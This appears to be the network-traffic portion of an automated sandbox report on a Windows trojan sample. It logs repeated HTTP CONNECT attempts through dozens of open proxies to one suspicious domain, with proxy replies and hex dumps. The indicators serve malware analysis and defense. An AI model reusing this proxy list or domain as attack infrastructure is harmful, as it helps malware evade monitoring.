                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.424851894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                514192.168.2.851214201.46.29.11556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.429308891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                515192.168.2.85125366.228.33.190367025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.444025040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                516192.168.2.851672211.222.252.18781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.444139957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                517192.168.2.851734212.110.188.220344095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.445029020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.991741896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.690501928 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                518192.168.2.85172284.39.112.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.450839043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                519192.168.2.851740141.94.174.6608705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.463989973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                520192.168.2.8516738.213.128.620205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.475322962 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                521192.168.2.85137966.228.37.252565605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.479316950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                522192.168.2.85168620.219.182.5931295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.480020046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.813719034 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                523192.168.2.85118535.200.161.98805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.493082047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.694761038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.591464996 CET83INHTTP/1.0 200 Connection Established
                                                                                Proxy-agent: Apache/2.4.57 (CentOS Stream)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                524192.168.2.851733185.217.143.23805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.493141890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.699879885 CET327INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                525192.168.2.85175272.210.252.134461645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.500716925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                526192.168.2.85175370.166.167.38577285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.501000881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                527192.168.2.85175498.162.25.4316545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.503175020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                528192.168.2.851785104.21.66.184805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.503307104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.591069937 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                529192.168.2.851669113.204.4.142108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.504297972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                530192.168.2.851795162.159.242.8805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.513473034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.601478100 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                531192.168.2.85152368.71.249.153486065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.537652016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                532192.168.2.851665171.244.10.204617005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.542246103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491688013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                533192.168.2.85183841.86.252.914435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.543694019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                534192.168.2.85183941.86.252.914435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.544456959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                535192.168.2.851757178.54.21.20380815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.545386076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                536192.168.2.85184141.86.252.914435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.547894955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                537192.168.2.851348176.99.2.4310815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.565763950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.789560080 CET228INHTTP/1.0 502 Bad Gateway
                                                                                Connection: close
                                                                                Content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                538192.168.2.85184441.86.252.914435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.567190886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                539192.168.2.851774184.72.36.89805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.573626041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.735671043 CET344INHTTP/1.1 403 Forbidden
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Server: Apache
                                                                                Content-Length: 199
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                540192.168.2.85180123.92.223.12231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.585385084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                541192.168.2.850063104.238.111.107300265828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.604054928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.694919109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695388079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695395947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.788635015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.897828102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                542192.168.2.851732125.19.99.9041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.612653017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                543192.168.2.851835172.67.250.212805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.626724958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.714457035 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                544192.168.2.850120189.240.60.16690905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.695214987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.884908915 CET72INHTTP/1.1 200 Connection established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                545192.168.2.851290183.215.23.24290915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.695512056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.121583939 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.1
                                                                                Date: Fri, 23 Feb 2024 13:28:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                546192.168.2.851355148.72.215.79258595828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.695513010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                547192.168.2.85002291.134.140.16088795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.695796967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                548192.168.2.85181372.210.221.19741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.696028948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                549192.168.2.851313115.144.163.199202835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.704597950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882390976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882782936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.882816076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                550192.168.2.85175847.114.101.5788885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.709755898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
